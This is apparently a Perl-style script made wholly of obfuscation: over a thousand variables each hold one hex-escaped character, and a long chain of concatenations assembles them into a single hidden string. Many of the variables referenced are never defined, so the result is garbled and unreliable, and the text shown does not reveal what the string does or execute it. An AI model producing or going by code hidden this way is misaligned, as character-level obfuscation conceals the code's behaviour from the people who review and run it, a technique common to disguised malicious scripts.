$btbd372="\x74";$btbd1273="\x40";$btbd740="\x3b";$btbd758="\x20";$btbd431="\x72";$btbd1661="\x69";$btbd1190="\x72";$btbd1589="\x65";$btbd1261="\x32";$btbd663="\x20";$btbd654="\x0a";$btbd421="\x6e";
$btbd230="\x28";$btbd1615="\x6f";$btbd1666="\x20";
$btbd811="\x20";
$btbd136="\x2e";$btbd711="\x6e";$btbd1523="\x6f";$btbd1452="\x67";$btbd700="\x61";$btbd697="\x20";$btbd1405="\x69";
$btbd1319="\x3d";$btbd249="\x0a";$btbd259="\x20";
$btbd689="\x30";$btbd213="\x20";$btbd1675="\x73";$btbd1221="\x24";$btbd248="\x3b";$btbd1629="\x6f";$btbd491="\x72";$btbd413="\x0a";$btbd542="\x73";$btbd1518="\x65";
$btbd603="\x20";$btbd218="\x0a";$btbd509="\x64";$btbd1188="\x74";$btbd1005="\x24";$btbd1290="\x7d";$btbd530="\x73";$btbd777="\x64";$btbd257="\x6c";$btbd624="\x69";
$btbd1288="\x7d";$btbd361="\x63";$btbd1149="\x6f";$btbd1655="\x22";
$btbd1449="\x72";$btbd1621="\x2c";$btbd51="\x61";$btbd43="\x32";
$btbd97="\x41";$btbd1082="\x74";$btbd1299="\x61";
$btbd558="\x73";$btbd1704="\x0a";$btbd1690="\x2b";$btbd340="\x65";$btbd563="\x09";
$btbd161="\x64";$btbd1526="\x20";
$btbd1300="\x6e";$btbd1321="\x69";$btbd698="\x24";$btbd150="\x68";$btbd1636="\x61";$btbd756="\x6e";$btbd1536="\x6e";$btbd1496="\x6c";
$btbd992="\x24";$btbd453="\x20";$btbd860="\x69";$btbd1254="\x3b";
$btbd53="\x74";$btbd1594="\x72";$btbd744="\x24";$btbd339="\x64";$btbd221="\x72";$btbd1019="\x64";$btbd532="\x73";$btbd1040="\x27";$btbd856="\x72";$btbd822="\x69";$btbd554="\x64";$btbd391="\x09";
$btbd969="\x3d";$btbd25="\x72";
$btbd599="\x0a";$btbd9="\x61";$btbd203="\x40";$btbd251="\x09";
$btbd564="\x24";$btbd1410="\x22";
$btbd1134="\x2c";$btbd943="\x28";$btbd492="\x65";$btbd39="\x28";$btbd1658="\x0a";$btbd1236="\x24";
$btbd521="\x73";$btbd965="\x29";$btbd511="\x20";$btbd985="\x65";
$btbd1487="\x6e";$btbd403="\x65";
$btbd760="\x66";$btbd960="\x32";$btbd895="\x6f";$btbd1207="\x6e";$btbd1408="\x66";$btbd401="\x65";$btbd708="\x20";$btbd200="\x29";$btbd793="\x3b";
$btbd112="\x72";
$btbd1133="\x31";$btbd956="\x61";
$btbd517="\x0a";$btbd534="\x75";$btbd572="\x09";
$btbd1448="\x74";$btbd1591="\x61";$btbd1276="\x32";$btbd255="\x75";$btbd1294="\x73";
$btbd513="\x61";$btbd1394="\x72";$btbd326="\x20";$btbd286="\x20";$btbd677="\x24";$btbd520="\x69";$btbd877="\x69";$btbd955="\x72";$btbd1416="\x69";$btbd1000="\x6e";$btbd268="\x20";$btbd948="\x25";
$btbd1056="\x22";$btbd47="\x20";$btbd807="\x6c";$btbd595="\x67";
$btbd1225="\x09";$btbd10="\x72";$btbd172="\x0a";$btbd72="\x74";$btbd334="\x68";
$btbd1111="\x61";$btbd1053="\x2e";$btbd98="\x6c";$btbd745="\x6d";$btbd798="\x0a";$btbd808="\x61";$btbd373="\x72";
$btbd1439="\x72";$btbd630="\x20";$btbd610="\x20";$btbd1274="\x24";$btbd754="\x22";$btbd733="\x74";$btbd1596="\x68";$btbd1086="\x20";
$btbd493="\x62";$btbd1266="\x20";$btbd990="\x22";$btbd318="\x20";$btbd843="\x72";$btbd800="\x23";$btbd254="\x62";
$btbd524="\x72";
$btbd498="\x20";$btbd1427="\x29";$btbd1350="\x20";$btbd1550="\x69";
$btbd1072="\x65";$btbd20="\x64";$btbd1208="\x65";$btbd1642="\x65";$btbd566="\x20";$btbd1357="\x6f";$btbd347="\x69";$btbd455="\x6e";$btbd1035="\x5f";
$btbd1401="\x20";
$btbd1643="\x2d";$btbd922="\x0a";$btbd1161="\x40";$btbd1650="\x61";
$btbd174="\x6d";$btbd1644="\x24";$btbd296="\x6c";$btbd101="\x72";$btbd107="\x20";$btbd1007="\x2e";$btbd1211="\x20";$btbd937="\x6e";$btbd816="\x28";$btbd1346="\x6e";
$btbd325="\x69";$btbd1483="\x20";
$btbd846="\x61";$btbd44="\x30";$btbd551="\x40";$btbd482="\x6f";$btbd1289="\x0a";$btbd802="\x63";$btbd1467="\x20";$btbd1117="\x68";$btbd1638="\x5f";$btbd1527="\x6f";$btbd99="\x6c";$btbd1464="\x20";$btbd853="\x09";$btbd792="\x29";
$btbd1126="\x09";
$btbd772="\x74";
$btbd954="\x28";$btbd1620="\x4f";$btbd133="\x73";$btbd1639="\x6e";$btbd445="\x65";$btbd312="\x6f";$btbd422="\x64";$btbd228="\x6d";$btbd269="\x6f";$btbd126="\x73";$btbd352="\x09";
$btbd348="\x29";$btbd971="\x20";$btbd780="\x30";$btbd949="\x20";$btbd1158="\x20";$btbd827="\x24";$btbd1069="\x6e";$btbd490="\x20";$btbd1472="\x72";
$btbd1263="\x24";$btbd936="\x5c";$btbd215="\x29";$btbd189="\x40";
$btbd1540="\x74";$btbd1112="\x74";
$btbd1447="\x73";$btbd1181="\x24";$btbd155="\x6d";$btbd1457="\x0a";
$btbd382="\x24";$btbd1700="\x69";$btbd82="\x6f";$btbd52="\x73";$btbd1308="\x67";$btbd175="\x79";$btbd942="\x20";$btbd167="\x68";$btbd1701="\x6f";$btbd1148="\x66";$btbd888="\x7b";$btbd472="\x0a";
$btbd639="\x73";$btbd571="\x0a";
$btbd342="\x3b";$btbd390="\x09";$btbd1227="\x40";$btbd710="\x69";$btbd1114="\x73";$btbd1145="\x3b";$btbd1363="\x20";$btbd1215="\x24";
$btbd1218="\x3d";$btbd973="\x29";
$btbd928="\x6f";$btbd285="\x73";$btbd1="\x20";$btbd913="\x65";$btbd1696="\x65";
$btbd1430="\x37";$btbd1413="\x22";$btbd1104="\x69";$btbd1581="\x0a";$btbd820="\x74";$btbd29="\x6e";$btbd691="\x78";$btbd1603="\x0a";$btbd425="\x69";$btbd1031="\x24";$btbd424="\x6d";
$btbd185="\x09";$btbd1480="\x64";$btbd1631="\x70";$btbd839="\x24";$btbd1548="\x2d";$btbd589="\x5f";
$btbd1455="\x7d";$btbd618="\x66";$btbd640="\x63";
$btbd1336="\x0a";$btbd767="\x25";$btbd1050="\x64";$btbd1667="\x24";$btbd100="\x20";$btbd1202="\x29";$btbd478="\x65";
$btbd686="\x5c";$btbd854="\x66";$btbd739="\x29";$btbd78="\x72";$btbd488="\x61";
$btbd614="\x22";$btbd159="\x63";$btbd1063="\x24";
$btbd525="\x5f";$btbd508="\x6f";
$btbd692="\x5c";$btbd866="\x20";$btbd125="\x74";$btbd483="\x20";$btbd1709="\x20";$btbd1582="\x24";$btbd580="\x6d";$btbd1444="\x6e";$btbd1674="\x6f";$btbd1312="\x09";
$btbd1456="\x0a";$btbd1695="\x6e";$btbd81="\x69";$btbd1118="\x75";$btbd308="\x74";$btbd270="\x66";$btbd1046="\x24";$btbd977="\x7d";$btbd1417="\x6e";$btbd941="\x66";$btbd68="\x63";$btbd181="\x20";$btbd821="\x72";$btbd461="\x77";$btbd290="\x63";$btbd261="\x6e";$btbd239="\x6e";$btbd664="\x2e";
$btbd480="\x20";$btbd437="\x72";$btbd1502="\x0a";$btbd1546="\x64";$btbd779="\x32";
$btbd=$btbd0.
$btbd1.$btbd2.$btbd3.$btbd4.$btbd5.$btbd6.$btbd7.$btbd8.$btbd9.$btbd10.$btbd11.$btbd12.$btbd13.$btbd14.$btbd15.$btbd16.$btbd17.$btbd18.
$btbd19.$btbd20.$btbd21.$btbd22.
$btbd23.$btbd24.
$btbd25.
$btbd26.$btbd27.$btbd28.$btbd29.$btbd30.
$btbd31.$btbd32.$btbd33.$btbd34.$btbd35.$btbd36.$btbd37.$btbd38.$btbd39.$btbd40.
$btbd41.$btbd42.$btbd43.$btbd44.$btbd45.
$btbd46.$btbd47.$btbd48.
$btbd49.$btbd50.
$btbd51.$btbd52.$btbd53.$btbd54.$btbd55.$btbd56.
$btbd57.$btbd58.$btbd59.$btbd60.
$btbd61.$btbd62.$btbd63.$btbd64.$btbd65.$btbd66.$btbd67.$btbd68.$btbd69.$btbd70.$btbd71.$btbd72.$btbd73.$btbd74.$btbd75.$btbd76.$btbd77.$btbd78.$btbd79.$btbd80.
$btbd81.$btbd82.$btbd83.
$btbd84.$btbd85.$btbd86.$btbd87.$btbd88.$btbd89.$btbd90.$btbd91.
$btbd92.
$btbd93.
$btbd94.$btbd95.$btbd96.$btbd97.$btbd98.$btbd99.$btbd100.$btbd101.$btbd102.
$btbd103.$btbd104.$btbd105.
$btbd106.$btbd107.$btbd108.$btbd109.$btbd110.$btbd111.
$btbd112.
$btbd113.$btbd114.$btbd115.$btbd116.$btbd117.$btbd118.$btbd119.
$btbd120.
$btbd121.$btbd122.
$btbd123.$btbd124.$btbd125.$btbd126.
$btbd127.$btbd128.$btbd129.$btbd130.
$btbd131.$btbd132.
$btbd133.$btbd134.$btbd135.$btbd136.$btbd137.$btbd138.$btbd139.$btbd140.$btbd141.
$btbd142.$btbd143.
$btbd144.
$btbd145.$btbd146.$btbd147.$btbd148.$btbd149.$btbd150.
$btbd151.$btbd152.
$btbd153.
$btbd154.$btbd155.$btbd156.
$btbd157.$btbd158.$btbd159.$btbd160.
$btbd161.$btbd162.$btbd163.$btbd164.$btbd165.$btbd166.
$btbd167.$btbd168.
$btbd169.$btbd170.
$btbd171.$btbd172.$btbd173.$btbd174.$btbd175.
$btbd176.
$btbd177.$btbd178.$btbd179.$btbd180.
$btbd181.$btbd182.$btbd183.$btbd184.$btbd185.$btbd186.$btbd187.$btbd188.$btbd189.$btbd190.$btbd191.$btbd192.$btbd193.$btbd194.$btbd195.$btbd196.$btbd197.$btbd198.$btbd199.$btbd200.$btbd201.$btbd202.$btbd203.$btbd204.$btbd205.$btbd206.$btbd207.$btbd208.$btbd209.$btbd210.
$btbd211.$btbd212.$btbd213.$btbd214.$btbd215.$btbd216.
$btbd217.$btbd218.$btbd219.$btbd220.$btbd221.$btbd222.$btbd223.$btbd224.$btbd225.
$btbd226.
$btbd227.$btbd228.$btbd229.$btbd230.$btbd231.$btbd232.$btbd233.$btbd234.
$btbd235.$btbd236.$btbd237.$btbd238.
$btbd239.$btbd240.
$btbd241.$btbd242.
$btbd243.$btbd244.
$btbd245.$btbd246.$btbd247.$btbd248.$btbd249.$btbd250.$btbd251.$btbd252.
$btbd253.$btbd254.$btbd255.$btbd256.
$btbd257.$btbd258.$btbd259.$btbd260.$btbd261.$btbd262.$btbd263.$btbd264.$btbd265.$btbd266.
$btbd267.$btbd268.$btbd269.$btbd270.$btbd271.$btbd272.$btbd273.$btbd274.
$btbd275.
$btbd276.$btbd277.$btbd278.$btbd279.
$btbd280.
$btbd281.$btbd282.$btbd283.$btbd284.$btbd285.$btbd286.$btbd287.$btbd288.$btbd289.
$btbd290.
$btbd291.$btbd292.$btbd293.$btbd294.$btbd295.$btbd296.$btbd297.$btbd298.$btbd299.$btbd300.$btbd301.$btbd302.$btbd303.$btbd304.$btbd305.$btbd306.
$btbd307.$btbd308.
$btbd309.$btbd310.$btbd311.$btbd312.$btbd313.$btbd314.$btbd315.$btbd316.$btbd317.$btbd318.$btbd319.$btbd320.$btbd321.$btbd322.$btbd323.$btbd324.$btbd325.
$btbd326.$btbd327.$btbd328.
$btbd329.$btbd330.
$btbd331.$btbd332.$btbd333.$btbd334.$btbd335.$btbd336.$btbd337.$btbd338.$btbd339.$btbd340.$btbd341.
$btbd342.
$btbd343.$btbd344.
$btbd345.
$btbd346.$btbd347.$btbd348.$btbd349.$btbd350.$btbd351.$btbd352.$btbd353.$btbd354.$btbd355.$btbd356.
$btbd357.$btbd358.$btbd359.$btbd360.
$btbd361.$btbd362.$btbd363.$btbd364.$btbd365.$btbd366.$btbd367.$btbd368.$btbd369.
$btbd370.$btbd371.$btbd372.$btbd373.$btbd374.$btbd375.$btbd376.
$btbd377.$btbd378.$btbd379.$btbd380.
$btbd381.$btbd382.
$btbd383.$btbd384.$btbd385.$btbd386.$btbd387.
$btbd388.$btbd389.$btbd390.$btbd391.$btbd392.
$btbd393.$btbd394.$btbd395.$btbd396.
$btbd397.$btbd398.$btbd399.$btbd400.
$btbd401.$btbd402.$btbd403.$btbd404.$btbd405.$btbd406.$btbd407.$btbd408.$btbd409.$btbd410.
$btbd411.$btbd412.
$btbd413.$btbd414.$btbd415.$btbd416.$btbd417.$btbd418.$btbd419.$btbd420.$btbd421.$btbd422.$btbd423.$btbd424.
$btbd425.$btbd426.
$btbd427.$btbd428.$btbd429.$btbd430.$btbd431.$btbd432.$btbd433.$btbd434.
$btbd435.
$btbd436.$btbd437.
$btbd438.$btbd439.$btbd440.$btbd441.$btbd442.$btbd443.$btbd444.$btbd445.$btbd446.$btbd447.$btbd448.$btbd449.$btbd450.
$btbd451.$btbd452.$btbd453.$btbd454.$btbd455.$btbd456.$btbd457.$btbd458.$btbd459.$btbd460.
$btbd461.$btbd462.$btbd463.$btbd464.$btbd465.$btbd466.$btbd467.$btbd468.$btbd469.$btbd470.$btbd471.$btbd472.$btbd473.$btbd474.$btbd475.
$btbd476.
$btbd477.$btbd478.
$btbd479.$btbd480.
$btbd481.$btbd482.$btbd483.$btbd484.$btbd485.$btbd486.$btbd487.$btbd488.$btbd489.
$btbd490.$btbd491.
$btbd492.$btbd493.$btbd494.$btbd495.$btbd496.$btbd497.$btbd498.
$btbd499.$btbd500.$btbd501.$btbd502.$btbd503.$btbd504.
$btbd505.$btbd506.$btbd507.$btbd508.$btbd509.$btbd510.
$btbd511.$btbd512.$btbd513.$btbd514.$btbd515.$btbd516.$btbd517.$btbd518.$btbd519.$btbd520.$btbd521.$btbd522.$btbd523.$btbd524.$btbd525.$btbd526.$btbd527.$btbd528.$btbd529.$btbd530.$btbd531.$btbd532.$btbd533.
$btbd534.$btbd535.$btbd536.$btbd537.$btbd538.$btbd539.$btbd540.$btbd541.$btbd542.$btbd543.$btbd544.$btbd545.$btbd546.
$btbd547.$btbd548.$btbd549.$btbd550.
$btbd551.$btbd552.$btbd553.$btbd554.$btbd555.
$btbd556.$btbd557.$btbd558.
$btbd559.
$btbd560.
$btbd561.$btbd562.
$btbd563.$btbd564.$btbd565.$btbd566.$btbd567.$btbd568.
$btbd569.$btbd570.$btbd571.$btbd572.$btbd573.$btbd574.$btbd575.$btbd576.$btbd577.$btbd578.
$btbd579.$btbd580.$btbd581.$btbd582.
$btbd583.$btbd584.
$btbd585.$btbd586.$btbd587.$btbd588.$btbd589.$btbd590.
$btbd591.$btbd592.$btbd593.$btbd594.$btbd595.
$btbd596.$btbd597.$btbd598.
$btbd599.
$btbd600.
$btbd601.$btbd602.$btbd603.$btbd604.$btbd605.$btbd606.$btbd607.$btbd608.
$btbd609.$btbd610.$btbd611.
$btbd612.
$btbd613.$btbd614.$btbd615.$btbd616.$btbd617.$btbd618.$btbd619.
$btbd620.$btbd621.$btbd622.$btbd623.$btbd624.$btbd625.$btbd626.$btbd627.$btbd628.$btbd629.
$btbd630.$btbd631.$btbd632.$btbd633.$btbd634.$btbd635.$btbd636.$btbd637.$btbd638.$btbd639.$btbd640.$btbd641.$btbd642.$btbd643.$btbd644.$btbd645.$btbd646.$btbd647.$btbd648.$btbd649.$btbd650.$btbd651.$btbd652.$btbd653.$btbd654.$btbd655.$btbd656.$btbd657.$btbd658.$btbd659.$btbd660.$btbd661.$btbd662.$btbd663.$btbd664.$btbd665.$btbd666.$btbd667.$btbd668.$btbd669.$btbd670.$btbd671.$btbd672.
$btbd673.$btbd674.$btbd675.$btbd676.
$btbd677.$btbd678.$btbd679.$btbd680.$btbd681.$btbd682.$btbd683.$btbd684.$btbd685.$btbd686.$btbd687.$btbd688.$btbd689.$btbd690.
$btbd691.$btbd692.
$btbd693.$btbd694.$btbd695.$btbd696.$btbd697.$btbd698.
$btbd699.$btbd700.
$btbd701.$btbd702.$btbd703.$btbd704.$btbd705.$btbd706.$btbd707.$btbd708.$btbd709.$btbd710.$btbd711.$btbd712.$btbd713.$btbd714.$btbd715.$btbd716.$btbd717.
$btbd718.
$btbd719.$btbd720.
$btbd721.$btbd722.$btbd723.$btbd724.$btbd725.$btbd726.$btbd727.$btbd728.$btbd729.$btbd730.$btbd731.$btbd732.$btbd733.$btbd734.$btbd735.$btbd736.
$btbd737.$btbd738.$btbd739.$btbd740.$btbd741.$btbd742.$btbd743.$btbd744.
$btbd745.$btbd746.$btbd747.$btbd748.
$btbd749.$btbd750.$btbd751.$btbd752.$btbd753.$btbd754.$btbd755.$btbd756.
$btbd757.$btbd758.$btbd759.$btbd760.$btbd761.$btbd762.$btbd763.
$btbd764.$btbd765.
$btbd766.$btbd767.$btbd768.$btbd769.$btbd770.$btbd771.
$btbd772.$btbd773.$btbd774.
$btbd775.$btbd776.
$btbd777.$btbd778.$btbd779.$btbd780.$btbd781.$btbd782.
$btbd783.$btbd784.$btbd785.$btbd786.$btbd787.$btbd788.$btbd789.$btbd790.
$btbd791.$btbd792.$btbd793.$btbd794.$btbd795.$btbd796.$btbd797.$btbd798.$btbd799.$btbd800.
$btbd801.$btbd802.$btbd803.
$btbd804.
$btbd805.
$btbd806.$btbd807.
$btbd808.
$btbd809.$btbd810.$btbd811.
$btbd812.$btbd813.$btbd814.$btbd815.$btbd816.
$btbd817.$btbd818.$btbd819.$btbd820.$btbd821.$btbd822.$btbd823.$btbd824.$btbd825.$btbd826.$btbd827.$btbd828.$btbd829.$btbd830.
$btbd831.$btbd832.$btbd833.$btbd834.$btbd835.$btbd836.$btbd837.$btbd838.$btbd839.$btbd840.
$btbd841.$btbd842.
$btbd843.$btbd844.$btbd845.$btbd846.
$btbd847.
$btbd848.
$btbd849.$btbd850.$btbd851.$btbd852.
$btbd853.$btbd854.
$btbd855.
$btbd856.$btbd857.$btbd858.$btbd859.$btbd860.$btbd861.$btbd862.$btbd863.$btbd864.
$btbd865.$btbd866.$btbd867.$btbd868.$btbd869.$btbd870.$btbd871.$btbd872.$btbd873.$btbd874.$btbd875.$btbd876.$btbd877.$btbd878.
$btbd879.$btbd880.
$btbd881.$btbd882.$btbd883.$btbd884.$btbd885.$btbd886.$btbd887.$btbd888.
$btbd889.$btbd890.$btbd891.$btbd892.$btbd893.$btbd894.$btbd895.$btbd896.$btbd897.
$btbd898.$btbd899.$btbd900.$btbd901.$btbd902.$btbd903.$btbd904.$btbd905.$btbd906.$btbd907.$btbd908.$btbd909.$btbd910.$btbd911.$btbd912.
$btbd913.$btbd914.
$btbd915.
$btbd916.$btbd917.$btbd918.$btbd919.$btbd920.$btbd921.$btbd922.
$btbd923.$btbd924.$btbd925.$btbd926.
$btbd927.
$btbd928.$btbd929.$btbd930.$btbd931.
$btbd932.$btbd933.$btbd934.$btbd935.$btbd936.
$btbd937.$btbd938.$btbd939.$btbd940.
$btbd941.$btbd942.$btbd943.$btbd944.$btbd945.$btbd946.
$btbd947.$btbd948.
$btbd949.$btbd950.$btbd951.
$btbd952.
$btbd953.$btbd954.$btbd955.$btbd956.
$btbd957.$btbd958.$btbd959.$btbd960.$btbd961.$btbd962.$btbd963.$btbd964.$btbd965.$btbd966.$btbd967.$btbd968.$btbd969.$btbd970.
$btbd971.$btbd972.
$btbd973.$btbd974.$btbd975.$btbd976.$btbd977.
$btbd978.$btbd979.$btbd980.$btbd981.$btbd982.$btbd983.
$btbd984.$btbd985.$btbd986.$btbd987.
$btbd988.$btbd989.$btbd990.$btbd991.$btbd992.$btbd993.$btbd994.$btbd995.$btbd996.$btbd997.$btbd998.$btbd999.$btbd1000.$btbd1001.$btbd1002.$btbd1003.$btbd1004.$btbd1005.$btbd1006.$btbd1007.$btbd1008.$btbd1009.$btbd1010.$btbd1011.$btbd1012.$btbd1013.$btbd1014.$btbd1015.$btbd1016.$btbd1017.$btbd1018.$btbd1019.$btbd1020.
$btbd1021.$btbd1022.$btbd1023.$btbd1024.$btbd1025.$btbd1026.$btbd1027.$btbd1028.$btbd1029.$btbd1030.
$btbd1031.$btbd1032.$btbd1033.$btbd1034.$btbd1035.
$btbd1036.$btbd1037.$btbd1038.$btbd1039.$btbd1040.
$btbd1041.$btbd1042.$btbd1043.
$btbd1044.$btbd1045.$btbd1046.$btbd1047.$btbd1048.$btbd1049.$btbd1050.$btbd1051.$btbd1052.$btbd1053.
$btbd1054.$btbd1055.$btbd1056.
$btbd1057.$btbd1058.$btbd1059.$btbd1060.
$btbd1061.$btbd1062.$btbd1063.$btbd1064.
$btbd1065.$btbd1066.$btbd1067.$btbd1068.
$btbd1069.
$btbd1070.$btbd1071.$btbd1072.$btbd1073.
$btbd1074.
$btbd1075.$btbd1076.$btbd1077.$btbd1078.$btbd1079.$btbd1080.
$btbd1081.$btbd1082.$btbd1083.$btbd1084.$btbd1085.$btbd1086.
$btbd1087.$btbd1088.$btbd1089.$btbd1090.$btbd1091.
$btbd1092.$btbd1093.$btbd1094.
$btbd1095.$btbd1096.$btbd1097.$btbd1098.
$btbd1099.$btbd1100.$btbd1101.$btbd1102.$btbd1103.$btbd1104.$btbd1105.$btbd1106.
$btbd1107.$btbd1108.
$btbd1109.$btbd1110.$btbd1111.$btbd1112.$btbd1113.$btbd1114.$btbd1115.$btbd1116.$btbd1117.$btbd1118.$btbd1119.$btbd1120.$btbd1121.$btbd1122.
$btbd1123.$btbd1124.
$btbd1125.$btbd1126.$btbd1127.$btbd1128.$btbd1129.$btbd1130.$btbd1131.$btbd1132.
$btbd1133.$btbd1134.
$btbd1135.$btbd1136.$btbd1137.$btbd1138.$btbd1139.$btbd1140.$btbd1141.$btbd1142.$btbd1143.$btbd1144.$btbd1145.$btbd1146.$btbd1147.$btbd1148.$btbd1149.$btbd1150.
$btbd1151.$btbd1152.$btbd1153.$btbd1154.$btbd1155.$btbd1156.$btbd1157.$btbd1158.
$btbd1159.$btbd1160.
$btbd1161.$btbd1162.$btbd1163.$btbd1164.
$btbd1165.$btbd1166.$btbd1167.
$btbd1168.
$btbd1169.$btbd1170.$btbd1171.$btbd1172.$btbd1173.$btbd1174.$btbd1175.
$btbd1176.$btbd1177.$btbd1178.$btbd1179.$btbd1180.
$btbd1181.$btbd1182.$btbd1183.$btbd1184.$btbd1185.
$btbd1186.$btbd1187.$btbd1188.$btbd1189.$btbd1190.$btbd1191.$btbd1192.$btbd1193.$btbd1194.$btbd1195.$btbd1196.$btbd1197.$btbd1198.$btbd1199.$btbd1200.$btbd1201.$btbd1202.$btbd1203.$btbd1204.$btbd1205.$btbd1206.
$btbd1207.$btbd1208.$btbd1209.$btbd1210.
$btbd1211.$btbd1212.
$btbd1213.$btbd1214.$btbd1215.$btbd1216.$btbd1217.$btbd1218.$btbd1219.$btbd1220.$btbd1221.
$btbd1222.
$btbd1223.
$btbd1224.
$btbd1225.$btbd1226.$btbd1227.$btbd1228.
$btbd1229.$btbd1230.$btbd1231.$btbd1232.$btbd1233.$btbd1234.$btbd1235.$btbd1236.$btbd1237.$btbd1238.$btbd1239.$btbd1240.$btbd1241.$btbd1242.$btbd1243.
$btbd1244.$btbd1245.$btbd1246.$btbd1247.$btbd1248.$btbd1249.$btbd1250.$btbd1251.$btbd1252.$btbd1253.$btbd1254.$btbd1255.$btbd1256.$btbd1257.$btbd1258.$btbd1259.$btbd1260.
$btbd1261.$btbd1262.$btbd1263.
$btbd1264.$btbd1265.
$btbd1266.$btbd1267.$btbd1268.$btbd1269.$btbd1270.$btbd1271.$btbd1272.$btbd1273.$btbd1274.
$btbd1275.$btbd1276.$btbd1277.$btbd1278.
$btbd1279.$btbd1280.$btbd1281.$btbd1282.$btbd1283.$btbd1284.$btbd1285.$btbd1286.$btbd1287.$btbd1288.$btbd1289.$btbd1290.$btbd1291.$btbd1292.$btbd1293.$btbd1294.$btbd1295.$btbd1296.
$btbd1297.$btbd1298.$btbd1299.$btbd1300.$btbd1301.$btbd1302.$btbd1303.$btbd1304.
$btbd1305.$btbd1306.$btbd1307.$btbd1308.$btbd1309.$btbd1310.$btbd1311.$btbd1312.
$btbd1313.$btbd1314.$btbd1315.$btbd1316.
$btbd1317.$btbd1318.$btbd1319.$btbd1320.
$btbd1321.$btbd1322.$btbd1323.$btbd1324.$btbd1325.$btbd1326.$btbd1327.$btbd1328.$btbd1329.$btbd1330.
$btbd1331.$btbd1332.$btbd1333.$btbd1334.$btbd1335.$btbd1336.$btbd1337.$btbd1338.
$btbd1339.$btbd1340.$btbd1341.$btbd1342.$btbd1343.$btbd1344.
$btbd1345.$btbd1346.$btbd1347.$btbd1348.$btbd1349.$btbd1350.$btbd1351.$btbd1352.
$btbd1353.$btbd1354.$btbd1355.$btbd1356.$btbd1357.$btbd1358.$btbd1359.$btbd1360.
$btbd1361.$btbd1362.
$btbd1363.$btbd1364.$btbd1365.$btbd1366.$btbd1367.$btbd1368.
$btbd1369.$btbd1370.
$btbd1371.$btbd1372.
$btbd1373.$btbd1374.$btbd1375.$btbd1376.$btbd1377.$btbd1378.$btbd1379.$btbd1380.
$btbd1381.$btbd1382.$btbd1383.$btbd1384.$btbd1385.$btbd1386.
$btbd1387.$btbd1388.$btbd1389.$btbd1390.
$btbd1391.$btbd1392.
$btbd1393.$btbd1394.$btbd1395.$btbd1396.$btbd1397.$btbd1398.$btbd1399.$btbd1400.
$btbd1401.$btbd1402.$btbd1403.$btbd1404.
$btbd1405.$btbd1406.$btbd1407.$btbd1408.
$btbd1409.$btbd1410.
$btbd1411.$btbd1412.$btbd1413.$btbd1414.$btbd1415.$btbd1416.$btbd1417.$btbd1418.$btbd1419.
$btbd1420.$btbd1421.$btbd1422.$btbd1423.$btbd1424.$btbd1425.$btbd1426.$btbd1427.$btbd1428.$btbd1429.$btbd1430.
$btbd1431.
$btbd1432.$btbd1433.$btbd1434.
$btbd1435.$btbd1436.$btbd1437.$btbd1438.$btbd1439.$btbd1440.$btbd1441.$btbd1442.$btbd1443.$btbd1444.$btbd1445.$btbd1446.$btbd1447.$btbd1448.$btbd1449.$btbd1450.
$btbd1451.$btbd1452.$btbd1453.$btbd1454.$btbd1455.$btbd1456.$btbd1457.$btbd1458.
$btbd1459.$btbd1460.$btbd1461.
$btbd1462.$btbd1463.
$btbd1464.
$btbd1465.$btbd1466.$btbd1467.$btbd1468.$btbd1469.$btbd1470.
$btbd1471.$btbd1472.$btbd1473.$btbd1474.$btbd1475.
$btbd1476.$btbd1477.$btbd1478.$btbd1479.$btbd1480.$btbd1481.$btbd1482.$btbd1483.$btbd1484.$btbd1485.$btbd1486.$btbd1487.$btbd1488.
$btbd1489.$btbd1490.$btbd1491.$btbd1492.$btbd1493.$btbd1494.$btbd1495.
$btbd1496.$btbd1497.$btbd1498.
$btbd1499.$btbd1500.
$btbd1501.$btbd1502.$btbd1503.$btbd1504.$btbd1505.$btbd1506.$btbd1507.$btbd1508.$btbd1509.$btbd1510.$btbd1511.$btbd1512.
$btbd1513.$btbd1514.$btbd1515.$btbd1516.$btbd1517.$btbd1518.$btbd1519.$btbd1520.
$btbd1521.$btbd1522.$btbd1523.$btbd1524.$btbd1525.$btbd1526.
$btbd1527.$btbd1528.$btbd1529.$btbd1530.$btbd1531.$btbd1532.$btbd1533.$btbd1534.$btbd1535.$btbd1536.
$btbd1537.$btbd1538.$btbd1539.$btbd1540.$btbd1541.$btbd1542.$btbd1543.$btbd1544.$btbd1545.$btbd1546.$btbd1547.$btbd1548.
$btbd1549.$btbd1550.$btbd1551.$btbd1552.$btbd1553.$btbd1554.
$btbd1555.$btbd1556.$btbd1557.$btbd1558.$btbd1559.$btbd1560.$btbd1561.$btbd1562.$btbd1563.$btbd1564.$btbd1565.$btbd1566.
$btbd1567.$btbd1568.$btbd1569.$btbd1570.$btbd1571.$btbd1572.
$btbd1573.$btbd1574.$btbd1575.$btbd1576.$btbd1577.$btbd1578.$btbd1579.$btbd1580.
$btbd1581.$btbd1582.$btbd1583.$btbd1584.
$btbd1585.$btbd1586.$btbd1587.$btbd1588.$btbd1589.$btbd1590.$btbd1591.$btbd1592.$btbd1593.$btbd1594.$btbd1595.$btbd1596.$btbd1597.$btbd1598.$btbd1599.$btbd1600.$btbd1601.$btbd1602.
$btbd1603.$btbd1604.$btbd1605.
$btbd1606.$btbd1607.$btbd1608.
$btbd1609.$btbd1610.$btbd1611.$btbd1612.
$btbd1613.$btbd1614.
$btbd1615.
$btbd1616.$btbd1617.$btbd1618.$btbd1619.$btbd1620.
$btbd1621.$btbd1622.$btbd1623.$btbd1624.$btbd1625.$btbd1626.$btbd1627.$btbd1628.
$btbd1629.
$btbd1630.$btbd1631.$btbd1632.$btbd1633.$btbd1634.
$btbd1635.
$btbd1636.$btbd1637.$btbd1638.$btbd1639.$btbd1640.$btbd1641.$btbd1642.
$btbd1643.$btbd1644.
$btbd1645.$btbd1646.$btbd1647.$btbd1648.$btbd1649.$btbd1650.
$btbd1651.$btbd1652.
$btbd1653.$btbd1654.$btbd1655.$btbd1656.$btbd1657.
$btbd1658.$btbd1659.$btbd1660.
$btbd1661.$btbd1662.$btbd1663.$btbd1664.$btbd1665.
$btbd1666.$btbd1667.$btbd1668.$btbd1669.$btbd1670.$btbd1671.$btbd1672.
$btbd1673.$btbd1674.$btbd1675.$btbd1676.$btbd1677.$btbd1678.$btbd1679.$btbd1680.
$btbd1681.$btbd1682.$btbd1683.$btbd1684.$btbd1685.$btbd1686.$btbd1687.$btbd1688.
$btbd1689.$btbd1690.$btbd1691.$btbd1692.
$btbd1693.$btbd1694.$btbd1695.$btbd1696.$btbd1697.$btbd1698.$btbd1699.$btbd1700.$btbd1701.
$btbd1702.$btbd1703.
